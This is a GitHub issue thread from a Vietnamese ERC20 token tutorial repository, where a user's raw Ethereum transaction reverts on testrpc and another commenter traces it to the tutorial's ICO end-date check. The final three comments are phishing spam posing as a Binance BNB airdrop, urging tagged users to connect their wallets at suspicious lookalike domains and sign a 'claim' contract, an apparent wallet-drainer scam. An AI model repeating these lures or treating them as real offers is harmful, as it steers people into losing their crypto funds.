### ISSUE TITLE
Error: [ethjs-rpc] rpc error with payload

### ISSUE THREAD

**Issue by quyetpham** [thanhson1085/DemoCoin#3]
A thanh sơn ơi xem cho em sao mà lúc e thực hiện ở bước này nó bão lỗi nhỉ
https://erc20token.sonnguyen.ws/en/latest/test_project/

"rawTx": "0xf873068504e3b2920083030d40948626ec8b073c1ff850f135828ce0a9571aae13f7880de0b6b3a7640000808602c203ce69d6a0eeb5439054e580921f8459210d18c3c69fcf8e878913d06980635736a735ce94a033d3eafcc25b5b5a5a2482e8063b3f3ee7b68422db83bc9ae74c2c367ccf6745",
        "err": {
          "message": "Error: [ethjs-rpc] rpc error with payload {\"id\":5453689424956,\"jsonrpc\":\"2.0\",\"params\":[\"0xf873068504e3b2920083030d40948626ec8b073c1ff850f135828ce0a9571aae13f7880de0b6b3a7640000808602c203ce69d6a0eeb5439054e580921f8459210d18c3c69fcf8e878913d06980635736a735ce94a033d3eafcc25b5b5a5a2482e8063b3f3ee7b68422db83bc9ae74c2c367ccf6745\"],\"method\":\"eth_sendRawTransaction\"} Error: VM Exception while processing transaction: revert",
          "stack": "Error: [ethjs-rpc] rpc error with payload {\"id\":5453689424956,\"jsonrpc\":\"2.0\",\"params\":[\"0xf873068504e3b2920083030d40948626ec8b073c1ff850f135828ce0a9571aae13f7880de0b6b3a7640000808602c203ce69d6a0eeb5439054e580921f8459210d18c3c69fcf8e878913d06980635736a735ce94a033d3eafcc25b5b5a5a2482e8063b3f3ee7b68422db83bc9ae74c2c367ccf6745\"],\"method\":\"eth_sendRawTransaction\"} Error: VM Exception while processing transaction: revert\n    at chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/scripts/background.js:58030:26\n    at chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/scripts/background.js:85780:9\n    at chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/scripts/background.js:16965:16\n    at replenish (chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/scripts/background.js:16809:25)\n    at iterateeCallback (chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/scripts/background.js:16799:17)\n    at chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/scripts/background.js:16981:16\n    at chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/scripts/background.js:85762:9\n    at chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/scripts/background.js:17099:16\n    at replenish (chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/scripts/background.js:16814:17)\n    at iterateeCallback (chrome-extension://nkbihfbeogaeaoehlefnkodbefgpgknn/scripts/background.js:16799:17)"
        }

**Comment by thanhson1085** [comment]
Em dùng ethereumjs-testrpc hay dựng geth node vậy?

**Comment by quyetpham** [comment]
Em dùng ethereumjs-testrpc làm đúng như trong ví dụ của anh.
Giờ còn đóng góp testnet nữa không anh?

**Comment by ducnb** [comment]
Em cũng bị lỗi tương tự như Bạn ấy Anh Sơn ạ. Hay là có sự khác biệt giữa lúc Anh viết và phiên bản mới nhất bây giờ hả Anh?

**Comment by ducnb** [comment]
Đã tìm ra lỗi nhé, trong kịch bản của Anh Sơn có một đoạn kiểm tra ngày bắt đầu và ngày kết thúc ICO, chỉ cần chỉnh lại ngày kết thúc ICO là được.

Cảm ơn Anh Sơn rất nhiều.

**Comment by thanhson1085** [comment]
Cảm ơn @ducnb , mọi người nhớ đổi ngày ngày ICO nhé :)

**Comment by knofte** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by arconejeros** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @gokhanm, @AlanLi000, @blacktoast, @danpaldev, @Rampl1ng, @wxf4150, @jubbon, @Showyilu, @edjroz, @vakond, @outsider69, @ApricotComputers, @laungcisin, @ymero, @AgwaB, @suwilanji-chipofya, @geraldb, @zhengchenghang, @philipjkim, @lixieinstein, @blankqwq, @wander4747, @SimHR, @anotherxx, @GreatMartial, @Harshiling, @nanlei2000, @zhousak, @sanghapark, @HAOYUatHZ, @feiquanbifeng, @gooney-zero, @NickWei714, @pslzym, @agrrd, @kvista, @satindergrewal, @zctocm, @flyer88, @VictorNelin, @jeevanpillay, @suclogger, @emahiro, @anton-shum, @prerambles23, @birdayz, @achafer, @mushroomsir, @tsusanka, @xiaochonzi

**Comment by sarawutp** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @adrianamazi, @Hebilicious, @ratthakorn2509, @ArdiModja24, @MCTzOCK, @FreezyEx, @RogerHiguerey
